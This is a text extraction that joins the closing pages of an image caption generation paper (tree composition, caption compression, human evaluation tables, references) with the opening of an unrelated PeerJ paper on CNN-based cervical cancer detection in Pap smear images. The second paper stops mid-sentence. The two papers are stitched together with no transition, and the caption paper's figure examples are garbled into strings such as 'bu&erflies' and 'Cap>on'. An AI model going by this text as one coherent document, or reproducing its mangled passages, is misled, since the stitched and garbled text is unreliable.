image corpus,10 and as- sume the original captions as the gold standard cap- tions to compare against. The results in Table 1 8We use the unigram NIST implementation: ftp://jaguar. ncsl.nist.gov/mt/resources/mteval-v13a-20091001.tar.gz 9With equal weight between precision and recall in Table 1. 10Except for those for which image URLs are broken, or CPLEX did not return a solution. 358 Method-1 Method-2 Criteria Method-1 preferred over Method-2 (%) all turkers turkers w/ κ > 0.55 turkers w/ κ > 0.6 Image Description Generation SEQ+TREE SEQ Rel 72 72 72 SEQ+TREE SEQ Gmar 83 83 83 SEQ+TREE SEQ All 68 69 66 SEQ+TREE+PRUNING SEQ+TREE Rel 68 72 72 SEQ+TREE+PRUNING SEQ+TREE Gmar 41 38 41 SEQ+TREE+PRUNING SEQ+TREE All 63 64 66 SEQ+TREE SEQ+LINGRULE All 62 64 62 SEQ+TREE+PRUNING SEQ+LINGRULE All 67 75 77 SEQ+TREE+PRUNING SEQ+PRUNING All 73 75 75 SEQ+TREE+PRUNING HUMAN All 24 19 19 Image Caption Generalization TREEPRUNING SEQCOMPRESSION∗ Rel 65 65 66 Table 2: Human Evaluation: posed as a binary question “which of the two options is better?” with respect to Relevance (Rel), Grammar (Gmar), and Overall (All). According to Pearson’s χ2 test, all results are statistically significant. show that both the integration of the tree structure (+TREE) and the generalization of captions using tree compression (+PRUNING) improve the BLEU score without brevity penalty significantly,11 while improving METEOR only moderately (due to an im- provement on precision with a decrease in recall.) 5.2 Human Evaluation Neither BLEU nor METEOR directly measure grammatical correctness over long distances and may not correspond perfectly to human judgments. Therefore, we supplement automatic evaluation with human evaluation. For human evaluations, we present two options generated from two compet- ing systems, and ask turkers to choose the one that is better with respect to: relevance, grammar, and overall. Results are shown in Table 2 with 3 turker ratings per image. We filter out turkers based on a control question. We then compute the selec- tion rate (%) of preferring method-1 over method-2. The agreement among turkers is a frequent concern. Therefore, we vary the set of dependable users based on their Cohen’s kappa score (κ) against other users. It turns out, filtering users based on κ does not make a big difference in determining the winning method. As expected, tree-based systems significantly out- perform sequence-based counterparts. For example, 11While 4-gram BLEU with brevity penalty is found to cor- relate better with human judges by recent studies (Elliott and Keller, 2014), we found that this is not the case for our task. This may be due to the differences in the gold standard cap- tions. We use naturally existing ones, which include a wider range of content and style than crowd-sourced captions. Seq:"A"bu&erfly"to"the"car"was"spo&ed"by" my"nine"year"old"cousin." Seq+Pruning:"The"bu&erflies"are" a&racted"to"the"colourful"flowers"to"the" car.+ Seq+Tree:"The"bu&erflies"are"a&racted"to" the"colourful"flowers"in"Hope"Gardens." " Seq+Tree+Pruning:"The"bu&erflies"are" a&racted"to"the"colourful"flowers." Orig:"The"bu&erflies"are"a&racted" to"the"colourful"flowers"in"Hope" Gardens." " SeqCompression:"The"colourful" flowers." " " TreePruning:"The"bu&erflies"are" a&racted"to"the"colourful"flowers." "" Cap>on"Generaliza>on" Image"Descrip>on"Genera>on" Figure 8: An example of a description preferred over hu- man gold standard. Image description is improved due to caption generalization. SEQ+TREE is strongly preferred over SEQ, with a selection rate of 83%. Somewhat surprisingly, im- proved grammaticality also seems to improve rele- vance scores (72%), possibly because it is harder to appreciate the semantic relevance of automatic cap- tions when they are less comprehensible. Also as expected, compositions based on pruned tree frag- ments significantly improve relevance (68–72%), while slightly deteriorating grammar (38–41%). Notably, the captions generated by our system are preferred over the original (owner generated) cap- tions 19–24% of the time. One such example is in- cluded in Figure 8: “The butterflies are attracted to the colorful flowers.” Additional examples (good and bad) are pro- vided in Figures 9 and 10. Many of these captions are highly expressive while remaining semantically 359 Human:"Some"flower"on"a" bar"in"a"hotel"in"Grapevine," TX." " & Seq+Tree+Pruning:"The" flower"was"so"vivid"and" a:rac<ve." Highly'expressive' Human:"Maybe"the"most"common" bird"in"the"neighborhood,"not"just" the"most"common"water"fowl"in" the"neighborhood!" & Seq+Tree+Pruning:"The"duck"was" having"a"feast." Human:"Spring"in"a"white" dress." & & Seq+Tree+Pruning:"Blue" flowers"have"no"scent." Small"white"flowers"have" no"idea"what"they"are." Poe0c' Human:"Tower"bridge" London"in"black"and" white.& & & Seq+Tree+Pruning:"The" tower"built"on"each"side." Human:"This"stained"glass" window"is"in"the"porch"of" Kilcash"Church,"Slieve"na" Mon." & Seq+Tree+Pruning:"This" window"depicts"the"church." Interes0ng'choice'of'verb'phrases' Human:"Shot"in"Blackpool"on" Tescos"car"park"with"use"of"a" 5M"candle"power"light.& & & & Seq+Tree+Pruning:"Red"car"in" the"middle"of"the"road." Informa0ve' Figure 9: Description generation: good examples. Description preferred over human gold standard are highlighted. Human:"The"floor"of"the" market"area"in"Tirumala"was" decorated"with"these"rangolis." " & Seq+Tree+Pruning:"In"a"tree" ball"from"the"ground"train" sta:on." Human:"Our"cat"sleeping" in"the"cot." " & Seq+Tree+Pruning:"Our" cat"is"si=ng"in"the"bird" feeder"and"actually"eats" the"sun"flower"seed." Human:"My"orange"is"in"a"very" blue"state." " " & Seq+Tree+Pruning:"Just"an" apple"in"the"sky." Human:"In"the"flower"bed"by" the"large"gate,"and"various" other"places"in"the"garden." " & Seq+Tree+Pruning:"Random" flowers"offered"to"me"by"two" liEle"girls." Seman&c(dissonance(due( to(generaliza&on(error( Completely(wrong( Extraneous(informa&on( Vision(detec&on(error( Human:"A"delighGul"clock" in"the"town"centre"of"St" Helier"with"the"iconic"Jersey" cow"at"the"base." & Seq+Tree+Pruning:"Not"the" clock"face"in"the"world." Grammar( problems( Human:"A"buEerfly"in"a" field"in"the"Santa"Monica" mountains." & Seq+Tree+Pruning:" Monarch"in"her"bedroom" before"the"wedding" ceremony." Literally(not(relevant,(but( metaphorically(crea&ve!( Figure 10: Description generation: bad examples. plausible, thanks to the expressive, but somewhat predictable descriptions online users write about their photos. Even among the bad examples (Fig- ure 10) one can find highly creative captions with not literal but metaphorical relevance: “Monarch in her bedroom before the wedding ceremony”.12 The complete system captions and the original captions are available at http://ilp-cky.appspot. com/ 6 Related Work Sentence Fusion Sentence fusion has been stud- ied mostly for multi-document summarization (Barzilay and McKeown, 2005), where redundancy across multiple sentences serves as a guideline for syntactic and semantic validity of generation. In contrast, we do not have the natural redundancy to rely upon in our task, therefore requiring the compo- sition algorithm to be intrinsically better constrained for correct sentence structures. 12“Monarch” can be a type of butterfly. Sentence Compression At the core of the image caption generalization task is sentence compression. Much work has considered deletion-only edits like ours (Knight and Marcu, 2000; Turner and Char- niak, 2005; Cohn and Lapata, 2007; Filippova and Altun, 2013), while recent ones explore more com- plex edits, such as substitutions, insertions and re- ordering (Cohn and Lapata, 2008). The latter gener- ally requires a larger training corpus. We leave more expressive compression as a future research work. 7 Conclusion In this paper, we have presented a novel tree com- position approach for generating expressive image descriptions. As an optional preprocessing step, we also presented a tree compression approach and re- ported the empirical benefit of using automatically compressed captions to improve image description generation. By integrating both the tree structure and the sequence structure, we have significantly im- proved the quality of composed image captions over several competitive baselines. 360 References Regina Barzilay and Kathleen McKeown. 2005. Sen- tence fusion for multidocument news summarization. Computational Linguistics, 31(3):297–328. Tamara L. Berg, Alexander C. Berg, and Jonathan Shih. 2010. Automatic attribute discovery and character- ization from noisy web data. In Proceedings of the 11th European Conference on Computer Vision: Part I, ECCV’10, pages 663–676, Berlin, Heidelberg. Springer-Verlag. Thorsten Brants and Alex Franz. 2006. Web 1t 5-gram version 1. In Linguistic Data Consortium. James Clarke and Mirella Lapata. 2008. Global infer- ence for sentence compression an integer linear pro- gramming approach. Journal of Artificial Intelligence Research, 31:399–429. Trevor Cohn and Mirella Lapata. 2007. Large margin synchronous generation and its application to sentence compression. In Proceedings of the 2007 Joint Confer- ence on Empirical Methods in Natural Language Pro- cessing and Computational Natural Language Learn- ing (EMNLP-CoNLL), pages 73–82, Prague, Czech Republic, June. Association for Computational Lin- guistics. Trevor Cohn and Mirella Lapata. 2008. Sentence com- pression beyond word deletion. In Proceedings of the 22nd International Conference on Computational Lin- guistics (Coling 2008), pages 137–144, Manchester, UK, August. Coling 2008 Organizing Committee. Navneet Dalal and Bill Triggs. 2005. Histograms of ori- ented gradients for human detection. In Proceedings of the 2005 IEEE Computer Society Conference on Computer Vision and Pattern Recognition (CVPR’05) - Volume 1 - Volume 01, CVPR ’05, pages 886–893, Washington, DC, USA. IEEE Computer Society. Jia Deng, Alexander C. Berg, Kai Li, and Fei-Fei Li. 2010. What does classifying more than 10,000 image categories tell us? In ECCV. Jia Deng, Alexander C. Berg, Sanjeev Satheesh, Hao Su, Aditya Khosla, and Fei-Fei Li. 2012a. Large scale visual recognition challenge. In http://www.image- net.org/challenges/LSVRC/2012/index. Jia Deng, Jonathan Krause, Alexander C. Berg, and L. Fei-Fei. 2012b. Hedging your bets: Optimiz- ing accuracy-specificity trade-offs in large scale visual recognition. In Conference on Computer Vision and Pattern Recognition. Michael Denkowski and Alon Lavie. 2011. Meteor 1.3: Automatic Metric for Reliable Optimization and Eval- uation of Machine Translation Systems. In Proceed- ings of the EMNLP 2011 Workshop on Statistical Ma- chine Translation. Jesse Dodge, Amit Goyal, Xufeng Han, Alyssa Men- sch, Margaret Mitchell, Karl Stratos, Kota Yamaguchi, Yejin Choi, Hal Daume III, Alexander C. Berg, and Tamara L. Berg. 2012. Detecting visual text. In Pro- ceedings of the 2012 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 762– 772, Montréal, Canada, June. Association for Compu- tational Linguistics. Desmond Elliott and Frank Keller. 2013. Image de- scription using visual dependency representations. In EMNLP, pages 1292–1302. Desmond Elliott and Frank Keller. 2014. Comparing automatic evaluation measures for image description. In ACL (2), pages 452–457. Ali Farhadi, Mohsen Hejrati, Mohammad Amin Sadeghi, Peter Young1, Cyrus Rashtchian, Julia Hockenmaier, and David Forsyth. 2010. Every picture tells a story: generating sentences for images. In European Confer- ence on Computer Vision. Pedro F. Felzenszwalb, Ross B. Girshick, David McAllester, and Deva Ramanan. 2010. Object detec- tion with discriminatively trained part based models. IEEE Transactions on Pattern Analysis and Machine Intelligence, 32(9):1627–1645. Yansong Feng and Mirella Lapata. 2013. Automatic caption generation for news images. IEEE Transac- tions on Pattern Analysis and Machine Intelligence, 35(4):797–812. Katja Filippova and Yasemin Altun. 2013. Overcoming the lack of parallel data in sentence compression. In EMNLP, pages 1481–1491. ILOG, Inc. 2006. ILOG CPLEX: High-performance software for mathematical programming and optimiza- tion. See http://www.ilog.com/products/ cplex/. Michael Jamieson, Afsaneh Fazly, Suzanne Stevenson, Sven J. Dickinson, and Sven Wachsmuth. 2010. Us- ing language to learn structured appearance models for image annotation. IEEE Trans. Pattern Anal. Mach. Intell., 32(1):148–164. Dan Klein and Christopher D. Manning. 2003. Accurate unlexicalized parsing. In Proceedings of the 41st An- nual Meeting on Association for Computational Lin- guistics, pages 423–430. Association for Computa- tional Linguistics. Kevin Knight and Daniel Marcu. 2000. Statistics-based summarization - step one: Sentence compression. In AAAI/IAAI, pages 703–710. Atsuhiro Kojima, Takeshi Tamura, and Kunio Fukunaga. 2002. Natural language description of human activi- ties from video images based on concept hierarchy of actions. IJCV, 50. 361 Niveda Krishnamoorthy, Girish Malkarnenkar, Ray- mond J. Mooney, Kate Saenko, and Sergio Guadar- rama. 2013. Generating natural-language video de- scriptions using text-mined knowledge. In AAAI. Alex Krizhevsky, Ilya Sutskever, and Geoffrey Hinton. 2012. Imagenet classification with deep convolutional neural networks. In NIPS. Girish Kulkarni, Visruth Premraj, Sagnik Dhar, Siming Li, Yejin Choi, Alexander C. Berg, and Tamara L. Berg. 2011. BabyTalk: Understanding and generat- ing simple image descriptions. In Conference on Com- puter Vision and Pattern Recognition. Polina Kuznetsova, Vicente Ordonez, Alexander C. Berg, Tamara L. Berg, and Yejin Choi. 2012. Collective generation of natural image descriptions. In Proceed- ings of the 50th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 359–368, Jeju Island, Korea, July. Association for Computational Linguistics. Polina Kuznetsova, Vicente Ordonez, Alexander C. Berg, Tamara L. Berg, and Yejin Choi. 2013. Generaliz- ing image captions for image-text parallel corpus. In The 51st Annual Meeting of the Association for Com- putational Linguistics - Short Papers, Sofia, Bulgaria, August. Association for Computational Linguistics. Thomas K. Leung and Jitendra Malik. 1999. Recog- nizing surfaces using three-dimensional textons. In ICCV, pages 1010–1017. Siming Li, Girish Kulkarni, Tamara L. Berg, Alexan- der C. Berg, and Yejin Choi. 2011. Composing sim- ple image descriptions using web-scale n-grams. In Proceedings of the Fifteenth Conference on Compu- tational Natural Language Learning, pages 220–228, Portland, Oregon, USA, June. Association for Compu- tational Linguistics. David G. Lowe. 2004. Distinctive image features from scale-invariant keypoints. Int. J. Comput. Vision, 60:91–110, November. Rebecca Mason and Eugene Charniak. 2013. Annota- tion of online shopping images without labeled train- ing examples. In Proceedings of Workshop on Vision and Language, Atlanta, Georgia, June. Association for Computational Linguistics. Rebecca Mason. 2013. Domain-independent caption- ing of domain-specific images. In Proceedings of the 2013 NAACL HLT Student Research Workshop, pages 69–76, Atlanta, Georgia, June. Association for Com- putational Linguistics. Margaret Mitchell, Jesse Dodge, Amit Goyal, Kota Ya- maguchi, Karl Stratos, Xufeng Han, Alyssa Mensch, Alexander C. Berg, Tamara L. Berg, and Hal Daumé III. 2012. Midge: Generating image descriptions from computer vision detections. In EACL, pages 747–756. Vicente Ordonez, Girish Kulkarni, and Tamara L. Berg. 2011. Im2text: Describing images using 1 million captioned photographs. In Neural Information Pro- cessing Systems (NIPS). Kishore Papineni, Salim Roukos, Todd Ward, and Wei jing Zhu. 2002. Bleu: a method for automatic evalua- tion of machine translation. In ACL. Florent Perronnin, Zeynep Akata, Zaid Harchaoui, and Cordelia Schmid. 2012. Towards good practice in large-scale learning for image classification. In CVPR. Dan Roth and Wen tau Yih. 2004. A linear programming formulation for global inference in natural language tasks. In Proc. of the Annual Conference on Computa- tional Natural Language Learning (CoNLL). Rion Snow, Brendan O’Connor, Daniel Jurafsky, and Andrew Y. Ng. 2008. Cheap and fast—but is it good?: Evaluating non-expert annotations for natural language tasks. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, EMNLP ’08, pages 254–263, Stroudsburg, PA, USA. Association for Computational Linguistics. Richard Socher, Andrej Karpathy, Quoc V. Le, Christo- pher D. Manning, and Andrew Y. Ng. 2014. Grounded compositional semantics for finding and de- scribing images with sentences. In Transactions of the Association for Computational Linguistics, pages 207 – 218, April. Jenine Turner and Eugene Charniak. 2005. Supervised and unsupervised learning for sentence compression. In Proceedings of the 43rd Annual Meeting of the Association for Computational Linguistics (ACL’05), pages 290–297, Ann Arbor, Michigan, June. Associa- tion for Computational Linguistics. Jianxiong Xiao, James Hays, Krista A. Ehinger, Aude Oliva, and Antonio Torralba. 2010. Sun database: Large-scale scene recognition from abbey to zoo. In CVPR. Yezhou Yang, Ching Teo, Hal Daume III, and Yiannis Aloimonos. 2011. Corpus-guided sentence genera- tion of natural images. In Proceedings of the 2011 Conference on Empirical Methods in Natural Lan- guage Processing, pages 444–454, Edinburgh, Scot- land, UK., July. Association for Computational Lin- guistics. Benjamin Z. Yao, Xiong Yang, Liang Lin, Mun Wai Lee, and Song-Chun Zhu. 2010. I2T: Image parsing to text description. Proc. IEEE, 98(8). Haonan Yu and Jeffrey Mark Siskind. 2013. Grounded language learning from video described with sen- tences. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Vol- ume 1: Long Papers), pages 53–63, Sofia, Bulgaria, August. Association for Computational Linguistics. 362 work_srlmqknhfna7jkf6u2ea4wgme4 ---- Cervical cancer detection in pap smear whole slide images using convNet with transfer learning and progressive resizing Cervical cancer detection in pap smear whole slide images using convNet with transfer learning and progressive resizing Anant R. Bhatt1,*, Amit Ganatra2,* and Ketan Kotecha3 1 Centre of Excellence for Artificial Intelligence, Military College of Telecommunication Engineering, Mhow, Madhya Pradesh, India 2 Devang Patel Institute of Advance Technology and Research, Charotar University of Science and Technology, Changa, Gujarat, India 3 Symbiosis Centre for Applied Artificial Intelligence, Symbiosis International (Deemed University), Pune, Maharashtra, India * These authors contributed equally to this work. ABSTRACT Cervical intraepithelial neoplasia (CIN) and cervical cancer are major health problems faced by women worldwide. The conventional Papanicolaou (Pap) smear analysis is an effective method to diagnose cervical pre-malignant and malignant conditions by analyzing swab images. Various computer vision techniques can be explored to identify potential precancerous and cancerous lesions by analyzing the Pap smear image. The majority of existing work cover binary classification approaches using various classifiers and Convolution Neural Networks. However, they suffer from inherent challenges for minute feature extraction and precise classification. We propose a novel methodology to carry out the multiclass classification of cervical cells from Whole Slide Images (WSI) with optimum feature extraction. The actualization of Conv Net with Transfer Learning technique substantiates meaningful Metamorphic Diagnosis of neoplastic and pre-neoplastic lesions. As the Progressive Resizing technique (an advanced method for training ConvNet) incorporates prior knowledge of the feature hierarchy and can reuse old computations while learning new ones, the model can carry forward the extracted morphological cell features to subsequent Neural Network layers iteratively for elusive learning. The Progressive Resizing technique superimposition in consultation with the Transfer Learning technique while training the Conv Net models has shown a substantial performance increase. The proposed binary and multiclass classification methodology succored in achieving benchmark scores on the Herlev Dataset. We achieved singular multiclass classification scores for WSI images of the SIPaKMed dataset, that is, accuracy (99.70%), precision (99.70%), recall (99.72%), F- Beta (99.63%), and Kappa scores (99.31%), which supersede the scores obtained through principal methodologies. GradCam based feature interpretation extends enhanced assimilation of the generated results, highlighting the pre-malignant and malignant lesions by visual localization in the images. Subjects Artificial Intelligence, Computer Vision, Data Mining and Machine Learning, Data Science Keywords Cervical cytology, Cervical cancer, Transfer learning, Papanicolaou smear, Progressive resizing, Convolution neural network, Sipakmed, Herlev, Metamorphic analysis, Deep learning How to cite this article Bhatt AR, Ganatra A, Kotecha K. 2021. Cervical cancer detection in pap smear whole slide images using convNet with transfer learning and progressive resizing. PeerJ Comput. Sci. 7:e348 DOI 10.7717/peerj-cs.348 Submitted 11 November 2020 Accepted 4 December 2020 Published 18 February 2021 Corresponding author Anant R. Bhatt, capt.anant@gmail.com Academic editor Rajanikanth Aluvalu Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.348 Copyright 2021 Bhatt et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.348 mailto:capt.�anant@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.348 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ INTRODUCTION The global cancer burden is estimated to have risen to 18.1 million new cases and 9.6 million deaths in 2018. One in five men and one in six women worldwide develop cancer during their lifetime, and one in eight men and one in 11 women die from the disease. Explicitly, Cervical cancer is the fourth most common malignant tumor threatening women’s health, especially in developing countries. The total number of cervical cancer cases in 2018 reported by the World Health Organization (WHO) was 570,000, and the number of deaths equal to 311,000 cervical cancer ranks fourth for both incidence (6.6%) and mortality (7.5%) (World Health Organization, 2018b). Cervical cancer develops in a woman’s cervix (the uterus’s entrance from the vagina). Human papillomaviruses (HPV)—a ubiquitous virus infection—is a primary cause of cervical cancer in 99% of the cases. Persistent infection of HPV leads to develop cervical cancer in women progressively. Uncontrolled growth of cells caused due to antiapoptotic mutations results in a lump of mass referred to as a tumor, and tumor buds can spread infections to other body parts, leading to severe medical conditions. The mortality and morbidity rate remain high if not detected/cured in due time (World Health Organization, 2018a). Studies suggest that cervical cancer can be treated successfully if the precancerous lesions are detected in time during cytological screening and Human Papilloma Virus (HPV) test (Saslow et al., 2012). HPV vaccination and detection/treatment are prevention methods in practice. Cervical cancer can be evicted by initiating proactive measures to prevent, carry out regular screening tests and treatment. The conventional Papanicolaou test (Papanicolaou & Traut, 1941), also called the Pap smear test, is an important stage for mitigating the rising challenge of cervical cancer. A skilled pathologist identifies carcinoma signatures by analyzing morphological features of the cells in microscopic slides manually. Since the manual analysis is subjective to the expert’s knowledge of the disease’s etiology and experience, it may lead to many true negative or false-positive results, leading to incorrect diagnoses and treatments. Also, screening tests carried out in mass imply a higher turn-around for results and substandard screening analysis. The non-availability of expert pathologists and suitable infrastructure restricts cervical cancer screening drives in developing countries. Deep Learning techniques provide a prodigious prospect for enhanced interpretation and analysis of the pap smear images during Metamorphic Diagnosis of Neoplastic and pre-neoplastic lesions. Since the cells’ morphology undergoes distinct changes during infections, they play a decisive role in identifying carcinoma signatures in pap smear image. Hence, Deep Learning techniques can extract relevant morphology features and carry out Whole Slide Image analysis to identify carcinoma conditions. We followed the Bethesda System (TBS) (Solomon et al., 2002), which explains the cytological classification based on standard medical terms to describe abnormal findings from CPS and LBC. Although the Convolution Neural Networks (CNN) can extract, identify, and classify the carcinoma cells, we elaborate on a novel methodology to improve morphological features’ extraction, thereby increasing accuracy, sensitivity, specificity, and F1 scores. State of the art implementation of various CNNs with transfer learning and progressive resizing Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 2/18 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ techniques present a definitive approach for enhanced learning and effective classifications of carcinoma cells. We studied current implementations/methods on the cervical cancer datasets. We analyzed the datasets and reviewed the recent work, that is, K-Means Clustering, SBRG algorithm (Isa, 2005). It detects the edges of multiple cells/the region of interest (ROI). In addition to the edge detection method, we explored different supervised and unsupervised techniques (Plissiti, Nikou & Charchanti, 2010; Plissiti et al., 2018). In these approaches, detection of nuclei locations was carried out, followed by a refinement step which used this nuclei information (circumference of the nuclei) was performed. Few of them were followed by a classification algorithm to detect the abnormal cells in the images. Both supervised and unsupervised techniques, that is, Support Vector Machines and fuzzy logic, were applied. We also studied various classifiers, that is, K-Nearest Neighbour, Stochastic Gradient Descent, Support Vector Machines (Cortes & Vapnik, 1995), and Random Forest. One of the approaches, that is, DeepPap (Zhang et al., 2017), was also studied in detail. In DeepPap, classification was performed on cropped images (single-cell cropping was carried out considering nuclei as the centroid). However, these methodologies suffer from prominent challenges as follows:- 1. It depends on the localization of nuclei; 2. Detection and classification of images of a single cell only; 3. Comparatively substandard feature extraction for unclear/blurred visual exposure of overlapping cells; 4. Single-cell classification implies Binary classification. We propose a methodology to subdue the existing binary classification scores and propose a multi-class classification for single-cell and Whole Slide Images of cervical cancer datasets, following the Bethesda System. The proposed approach of superimposing Progressive Resizing with Transfer Learning on CNN yields promising multi-class classification scores with improved visual inferences. Deep learning models are known to have limited interpretability, and it is a challenging and active area of research (Simonyan, Vedaldi & Zisserman, 2013). To enhance the interpretability, we implemented a complementary interpretation with intuitive saliency maps (GradCam) Visualisation. GradCam aids in apprehending the features learned by our model to ensure a high level of transparency in visual interpretation (Zhang, Nian Wu & Zhu, 2018). We carried out experiments on two different datasets obtained from different Institutes/University. To summarize, our contributions are as follows: 1. To the best of our knowledge, the proposed work is the first implementation to present a singular multi-class classification methodology for Neo-plastic and Pre-Neoplastic lesion detection in Whole Slide Images. 2. Our experiments achieved State-of-the-Art performance scores for binary and multi-class classification on Herlev and SIPaKMeD datasets. Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 3/18 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ 3. The CNN implementation with Progressive Resizing and Transfer Learning techniques yields significant improvements and generated benchmark scores for multi-class classification for whole slide images of the SIPaKMeD dataset, which helps in carrying out metamorphic analysis even for overlapping cell lesions. 4. The article also brings out the comparative study of the results produced by various classifiers and advanced CNN models (trained using Transfer Learning and Progressive resizing techniques) on Herlev and SIPaKMeD datasets. 5. GradCam based feature interpretation extends enhanced assimilation of the generated results, highlighting the pre-malignant and malignant lesions by visual localization in the images. DATASETS We carried out experiments on Herlev and SIPaKMeD (Plissiti et al., 2018) databases separately. Herlev database-created at the Herlev University Hospital, Denmark, utilizing a digital camera microscope and contains 917 images of single cells. Skilled cyto-technicians and doctors have annotated each cell into one of seven classes (i.e., Superficial squamous epithelia, Intermediate squamous epithelia, Columnar epithelial, Mild squamous non-keratinizing dysplasia, Moderate squamous non-keratinizing dysplasia, Severe squamous non-keratinizing dysplasia, and Squamous cell carcinoma). The morphological features (i.e., cell shape, nucleus size, nucleus to cytoplasm ratio, nucleus opacities, nucleus dying intensities, cytoplasm opacities, and cytoplasm dying intensities) help differentiate the cells. The SIPaKMed database consists of 4,049 annotated images that have been manually cropped from 966 cluster cell images by the expert cytopathologists into five categories. The cells are classified as normal cells under two types (Superficial-intermediate, Parabasal), as abnormal cells are classified into two categories (Koilocytotic and Dyskeratotic), and as benign categorization (metaplastic) cells. The dataset distributions for Herlev and SIPaKMeD datasets are shown in Figs. 1 and 2, respectively. The specimen pap smear images of the Herlev dataset and SIPaKMeD dataset are shown in Figs. 3 and 4. PROPOSED METHODOLOGY We have objected our work to carry out experiments on binary classification for Herlev and SIPakMeD datasets using K-Nearest Neighbour, Stochastic Gradient Descent, Support Vector Machine, and Random Forest classifiers. Then, Convolution Neural Network models, that is, VGG-19 (Simonyan & Zisserman, 2014), ResNet-34 (Szegedy et al., 2016), and EfficientNet-B3 (Tan & Le, 2019) were employed to carry out binary classification where CNNs have shown considerable improvements in the results compared to other classifiers. We carried out due customization of the final layers of CNN models for multi-class classifications for the Herlev and SIPaKMeD datasets. We used pre-trained weights from the ImageNet dataset (referenced as Transfer Learning (Pan & Yang, 2009)) with superimposition of Progressive Resizing techniques while training the CNN models to train Cervical Cancer datasets. Finally, the multi-class classification experiments highlight enhanced results for both datasets. Saliency maps for Whole Slide Images Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 4/18 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ improve assimilation along with classification scores. Figure 5 illustrates the proposed methodology to generate classification results with Saliency Map employing Convolution Neural networks using Transfer Learning and Progressive Resizing techniques. The Figure 1 The Herlev Cervical Cancer dataset distribution, categorized into seven classes. Full-size DOI: 10.7717/peerj-cs.348/fig-1 Figure 2 The SIPaKMeD Cervical Cancer dataset distribution, categorized into five classes. The distribution of full cell images at (A) and whole slide image in the datasets at (B) are shown. Full-size DOI: 10.7717/peerj-cs.348/fig-2 Figure 3 Single cell Images from the Herlev Dataset, categorized into seven classes and shown as (A) superficial squamous epithelia, (B) intermediate squamous epithelia, (C) columnar epithelial, (D) mild squamous non-keratinizing dysplasia, (E) moderate squamous non-keratinizing dysplasia, (F) Severe squamous non-keratinizing dysplasia, (G) squamous cell carcinoma in situ. Full-size DOI: 10.7717/peerj-cs.348/fig-3 Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 5/18 http://dx.doi.org/10.7717/peerj-cs.348/fig-1 http://dx.doi.org/10.7717/peerj-cs.348/fig-2 http://dx.doi.org/10.7717/peerj-cs.348/fig-3 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ implementation consists of four stages: (1) Data Preprocessing, (2) Model Implementation, (3) Training Strategy, (4) Testing. Data preprocessing Since data augmentation acts as a regularizer and helps reduce overfitting while training the machine learning model, we used data augmentation techniques to expand the training dataset’s size artificially. We created modified versions of the dataset’s images. We generated skillful models with improved ability to generalize and classify the images by training the deep learning models on more data variations. We implemented transformation techniques to generate cell image variations as the cells are invariant to Figure 4 Single-cell images from the SIPaKMeD Dataset, categorized into five classes: (A) Superficial-Intermediate cells, (B) Parabasal cells, (C) Metaplastic cells, (D) Dyskeratotic cells, and (E) Koilocytotic cells. Full-size DOI: 10.7717/peerj-cs.348/fig-4 Figure 5 The methodology with inference pipeline used to analyze the Pap smear (Whole Slide) Images using ConvNets (trained using Transfer Learning and Progressive Resizing techniques) to generate Predictions and Activation Map. Full-size DOI: 10.7717/peerj-cs.348/fig-5 Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 6/18 http://dx.doi.org/10.7717/peerj-cs.348/fig-4 http://dx.doi.org/10.7717/peerj-cs.348/fig-5 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ the rotations. We carried out these transformation with, value of θ = −60 to 60 degrees, α = 1.0 − 1.1, PA = 0.75 and PB = 0.5 while employing the following techniques:- 1. Horizontal flipping of the images with a probability of PB. 2. We applied rotations to the images due to their rotational invariance. 3. Random scaling of α with a probability of PA. Model implementation Herlev and SIPakMeD datasets incorporate single-cell images. Whole Slide Images (WSI) of the SIPaKMeD dataset which expose varied intensity (average intensity, average contrast), texture (smoothness, uniformity, third moment, entropy), and shape features (area, major and minor axis length, eccentricity, orientation, equivalent diameter, solidity, and extent). The proposed CNN implementation deliberate on effective cell morphology feature extraction, that is, cell cytoplasm, cell shape, nucleus type, hyperchromicity, dying exposures of cells, and cell edges. We experimented VGG-19, ResNet-34, ResNet-101, EfficientNet-B3, EfficientNet-B4, and EfficientNet-B5 models. As EfficientNets (image classification models) scale more efficiently by balancing the network’s depth, width, and resolution deliberately over other CNNs, we carried out experiments on EfficientNet models to enhance performance. We have customized the output layers to suitably perform binary and multi-class classification (Tan & Le, 2019). The values of the hyperparameters have been optimized while carrying out experiments. To implement Transfer Learning, we used pre-trained weights obtained after training the model on a large dataset (i.e., ImageNet) while re-training the CNNs on the Herlev and SIPaKMeD datasets. We applied the Progressive Resizing technique by running the iterations repetitively to extract the optimum weights with precise feature extraction. These optimum weights were carried forward to the experiments’ subsequent iteration, where we resized the images from 224 to 256, 512, 1024, and 2048 progressively and ran the experiments. Iterations outcomes were analyzed continuously to achieve the best of the classification scores. Training strategy Among the family of EfficientNet models, we used EfficientNet-B3, B4, and B5 CNN models with pre-trained weights obtained from the ImageNet Large Scale Visual Recognition Challenges dataset with 1,000 classes. Models’ customization at the final classification layer was applied to classify the cells into the desired output classes. While training the model for the Herlev dataset and SiPaKMeD dataset, the final classification layers were customized to classify seven and five classes, respectively. Training and test data were split into the 80:20 ratio. Transfer Learning and Progressive Resizing techniques were employed while re-training the CNN models to leverage the ImageNet pre-trained model’s features. We used Categorical Cross—Entropy as the 